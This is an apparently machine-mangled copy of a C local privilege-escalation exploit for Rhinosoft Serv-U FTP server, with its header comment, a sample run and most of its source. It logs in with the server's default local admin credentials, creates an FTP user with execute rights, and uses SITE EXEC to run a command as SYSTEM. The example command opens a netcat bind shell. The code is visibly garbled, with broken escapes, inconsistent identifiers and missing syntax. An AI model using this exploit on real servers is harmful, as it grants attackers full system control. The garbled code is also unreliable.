Rhinosoft Serv-U 5.1.0.0.0.0.0.0.9rhinosoft serv-u 5.0.0.4rhinosoft serv-u 5.0Rhinosoft Serv-U 4.1.0.3rhinosoft serv-u 4.0.0.0.4rhinosoft serv- U 4.0.0.0rhinosoft serv-u 3.0.0.20
test program
/ ** Hax0rcitos proudly presents * Serv-u Local Exploit> v3.x. (Tested also against last version 5.1.0.0) ** All Serv-u Versions have default Login / password for local Administration. * This account is only available to connect in the loopback interface, so a * local user will be able to connect to Serv-u with this account and create * an ftp user with execute rights. after the user is created, just connect * to the ftp server and execute a raw "SITE EXEC" command. the program will * be execute with SYSTEM privileges. ** Copyright (c) 2003-2004 Haxorcitos.com. All Rights Reserved. ** THIS PROGRAM IS FOR EDUCATIONAL PURPOSES * ONLY * IT IS PROVIDED "AS IS .. "* aND WITHOUT ANY WARRANTY COPYING, PRINTING, DISTRIBUTION, MODIFICATION * WITHOUT PERMISSION OF THE AUTHOR IS STRICTLY PROHIBITED *** Date: 10/2003 * Author: Andrés Tarascó Acunha ** Greetings to: #haxorcitos - #localhost and # ! dsr blackxors =) ** TESTED AGAINST SERV-U 4.x and v5.1.0.0 g: / expedition / serv-u / local> Whoami insane / at4r G: / Exploit / Serv-U / Local> Servulocal.exe "nc -l -p 99 -e cmd.exe" Serv-U> 3.x local Exploit by Haxorcitos <220 Serv-U ftp server v5.0 for Winsock Ready ...> User Localadministrator <331 User Name Okay, Need Password. ********************************************* *******************> Pass #l@ or $ak#.lk; 0 @ P <230 user logged in, proceed. ******** ***********************************> Site maintenance * *********************************************************** *** [ ] Creating New Domain ... <200-domainid =
3 220 Domain Settings Saved **************************************************** ********* [ ] Domain Haxorcitos: 3 created [ ] setting new domain online <220 server command ok ***************************** ******************************************* [ ] Creating Evil User <200-user = JMGS 200 User Settings Saved * *********************************************************** *** [ ] Now Exploiting ...> User JMGS <331 user name okay, need password. ******************************************* ***************************> Pass 111111 <230 user logged in, proceed. ************ ***************************************** [ ] now Executing: NC - L -P 99-E cmd.exe <220 domain deleted ********************************************* ***************** G: / EXPLOIT / Serv-U / Local> NC Localhost 99 Microsoft Windows XP [Versión 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C: /> JMGS JMGS NT A Uthority / system c: /> * / # include
#de #l@ / @ @ @ $ @ $ @P / r / n "#define maintenance" site maintenance / r / n "#define exit" quit / r / n "char newdomain [] =" SetDomain / r / n "" -domain = jmgs | 0.0.0.0 | 2121 | -1 | 1 | 0 / r / n "" -tzoenable = 0 / r / n "" TZoKey = / r / n "; / * "-Dyndnsenable = 0 / r / n" "DynipName = / r / n"; * / char Deldomain [] = "- deleteDomain / r / n" "-ip = 0.0.0.0 / r / n" "portno = 2121 / r / n "; char newuser [] =" -setUsetup / r / n "" -ip = 0.0.0 / r / n "" -portno = 2121 / r / n "" -user = jmgs / r / n "" -Password = 111111 / r / n "" -homedir = c: /// r / n "" -loginmesfile = / r / n "" -disable = 0 / r / n "" -relpaths = 1 / r / n "" -needsecure = 0 / r / n "" -hidehidden = 0 / r / n "" -Alwaysallowlogin = 0 / r / n "" -changepassword = 0 / r / n "" -quotaenable = 0 / r / N "" -Maxusersloginperip = -1 / r / n "" -speedlimitup = 0 / r / n "" -speedlimitdown = 0 / r / n "" -maxnrusers = -1 / r / n "" -idletimeout = 600 / r / n "" -SessionTIMEOUT = -1 / r / n "" -expire = 0 / r / n "" -ratioup = 1 / r / n "" -ratiodown = 1 / r / n ""
-Ratioscredit = 0 / r / n "" -quotacurrent = 0 / r / n "" -quotamaximum = 0 / r / n "" -maintence = none / r / n "" -parswordtype = regular / r / n "" -Ratios = none / r / n "" Access = C: // | Relp / R / N "; #define localport 43958 # Define localip" 127.0.0.1 "Char Cadena [1024]; int REC, DOMAIN; / ** *********************************************************** *********************************** / VOID PARSECMMAVAnds (int SHOCK, CHAR * DATA, INT Showsend, int showResponses, char * response) {send (SEND) SOCK, DATA, STRLEN (DATA), 0); IF (Showsend) Printf (">% S", DATA); SLEEP (100); do {REC = Recv (Sock, Cadena, Sizeof (Cadena), 0) Cadena [REC] = '/ 0'; if (Rec <= 0) Return; IF (ShowResponses) Printf ("<% S", CADENA); IF (Strncmp (Cadena, DomainID, Strlen (DomainID) == 0 ) Domain = ATOI (Cadena Strlen); //} while (Strncmp (Cadena, Response, Strlen (Response))! = 0);} while (strstr (cadena, response) == null); printf "******************************************************** ***** / r / N ");} / ************************************************** ********************************************* / INT MAIN (int Argc, char * argv []) {WSADATA WS; int SOCK, SOCK2; STRUCT SOCKADDR_IN JMGS; STRUCKADDR_IN XPL; PrintF ("Serv-U> 3.x LOCAL EXPLOIT BY JMGS / R / N / R / N"); IF (Argc <2) {Printf (" USAGE: Servulocal.exe / "Comming /" / R / N "); Printf (" EXAMPLE: Servulocal.exe / "nc.exe -l -p 99-E cmd.exe / "); Return (0); } IF (WSAStartup (MakeWord (2, 2), & WS)! = 0) {Printf ("
[-] WSAStartup () error / n "); exit (0);} Haxorcitos.sin_Family = AF_INET; HAXORCITOS.SIN_PORT = HTONS (localport); Haxorcitos.sin_addr.s_addr = inet_addr (localip); SOCK = Socket (AF_INET, SOCK_STREAM, IPPROTO_TCP); Connect (Sock, (Struct SockAddr *) & JMGS, SIZEOF (JMGS)); REC = Recv (Sock, Cadena, Sizeof (Cadena), 0); Cadena [REC] = '/ 0'; Printf "<% s", cadena; Parsecommands (Sock, User, 1, 1, Userok); ParseCommands (Sock, Password, 1, 1, Passok); ParseCommands (Sock, Maintenance, 1, 0, "230"); Printf ("[ ] Creating New Domain ... / R / N"); ParseCommands (Sock, Newdomain, 0, 1, Banner); Printf ("[ ] Domain Haxorcitos:% i created / n", Domain) ; / * Only for v5.x printf ("[ ] setting new domain online / r / n"); sprintf (cadena, "- servercommand / r / n-id =% I / R / NCommand = Domainonline / R / N ", Domain); ParseCommands (Sock, Cadena, 0, 1, Banner); * / Printf (" [ ] Creating Evil User / R / N "); ParseCommands (Sock, Newuser, 0, 1," 200 " Sleep (1 000); Printf ("[ ] now exploiting ... / r / n"); xpl.sin_family = AF_INET; xpl.sin_port = htons (2121); xpl.sin_addr.s_addr = inet_addr (localip); SOCK2 = Socket (AF_INET, SOCK_STREAM, IPPROTO_TCP); Connect (Sock2, Struct SockAddr *) & XPL, SizeOf (XPL)); REC = Recv (Sock2, Cadena, Sizeof (Cadena), 0); Cadena [REC] = '/ 0' ParseCommands (SOCK2, XPLUSER, 1, 1, Userok); ParseCommands (SOCK2, XPLPassword, 1, 1, Passok); Printf ("[ ] Now Executing:% S / R / N", Argv [1]); Sprintf (Cadena, "Site EXEC% S / R / N", Argv [1]);
